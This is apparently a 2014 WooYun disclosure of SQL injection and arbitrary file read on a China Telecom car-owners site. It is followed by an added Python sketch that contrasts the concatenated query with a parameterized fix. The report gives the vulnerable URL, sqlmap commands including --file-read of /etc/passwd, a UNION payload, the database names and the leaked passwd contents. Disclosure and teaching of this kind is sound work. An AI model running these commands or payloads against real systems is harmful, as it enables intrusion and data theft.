
SQL injection and arbitrary file read on a China Telecom site

2014-07-04 16:25

Haoma Baishitong (118114) Car Owners Circle: http://auto.118114.cn/

Judging from the UID assigned to a newly registered user, the site has roughly 50,000+ members.

On the registration page http://auto.118114.cn/entry, choose "Enterprise user registration"; after selecting a province, the following HTTP request is captured:

[screenshot: 04.jpg]



http://auto.118114.cn/block/loginact?act=get_areas&pcode=110000&registercateg=1&v=37



The pcode parameter in this request is vulnerable to SQL injection.

Proof of vulnerability:

sqlmap.py -u "http://auto.118114.cn/block/loginact?act=get_areas&pcode=110000&registercateg=1&v=37" --dbs --current-user --current-db



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pcode
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: act=get_areas&pcode=110000 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e6f7471,0x4856624675454663676a,0x7169626a71),NULL#&registercateg=1&v=37
---
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'ucenter'
available databases [10]:
[*] 114
[*] gcn1
[*] information_schema
[*] itoa
[*] mysql
[*] phpmyadmin
[*] sns_ibesttone
[*] ucenter
[*] ucenter1
[*] ucenter2



sqlmap.py -u "http://auto.118114.cn/block/loginact?act=get_areas&pcode=110000&registercateg=1&v=37" --file-read="/etc/passwd"



root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
bst:x:1000:1000:bst,,,:/home/bst:/bin/bash
ftp:x:106:65534::/home/ftp:/bin/false
ftp1:x:1002:1003::/home/ftp1:/bin/sh
bstftp:x:1003:1005::/var/www:/bin/sh
bst1:x:1004:1006::/home/bst1:/bin/sh
oracle:x:1005:1007::/home/oracle:/bin/bash
postfix:x:107:116::/var/spool/postfix:/bin/false

Fix:

Telecom knows better than I do :)
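As an added illustration that is not part of the original report, the Python sketch below shows the class of flaw behind the pcode parameter (the value spliced into the query unchanged) next to the validated, parameterized form that closes it. The table layout is constructed, since the report only reveals that the injection point has 5 columns, and sqlmap's UNION payload is adapted to SQLite syntax so the example runs offline. The file read succeeded because the application connected as root@localhost; a dedicated database account without the FILE privilege would have stopped that part even with the injection present.

```python
import re
import sqlite3

# Constructed sample data standing in for the site's area table; the real
# schema is unknown, only that the injection point returned 5 columns.
ROWS = [
    (110000, 110100, "Beijing", "Beijing City", 1),
    (110000, 110200, "Beijing", "Beijing County", 1),
    (310000, 310100, "Shanghai", "Shanghai City", 1),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE areas (pcode INTEGER, code INTEGER, "
                 "province TEXT, name TEXT, level INTEGER)")
    conn.executemany("INSERT INTO areas VALUES (?,?,?,?,?)", ROWS)
    return conn

def get_areas_vulnerable(conn, pcode):
    # Mirrors the flaw in the report: the pcode parameter is concatenated
    # into the SQL text, so the caller controls the rest of the statement.
    sql = ("SELECT pcode, code, province, name, level FROM areas "
           "WHERE pcode = " + pcode)
    return conn.execute(sql).fetchall()

def get_areas_safe(conn, pcode):
    # Reject anything that is not a 6-digit area code, then bind the value
    # as a parameter so it can never be parsed as SQL.
    if not re.fullmatch(r"[0-9]{6}", pcode):
        raise ValueError("pcode must be a 6-digit area code")
    sql = ("SELECT pcode, code, province, name, level FROM areas "
           "WHERE pcode = ?")
    return conn.execute(sql, (int(pcode),)).fetchall()

def safe_rejects(conn, pcode):
    # True when the hardened handler refuses the input outright.
    try:
        get_areas_safe(conn, pcode)
        return False
    except ValueError:
        return True

# sqlmap's UNION payload from the report, adapted to SQLite: '||' replaces
# CONCAT() of hex literals (0x716e6f7471 etc. decode to the same strings)
# and '--' replaces MySQL's '#' comment.
PAYLOAD = "110000 UNION ALL SELECT NULL,NULL,NULL,'qnotq'||'HVbFuEFcgj'||'qibjq',NULL--"
```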


Source: www.wooyun.org/bugs/wooyun-2014-061174
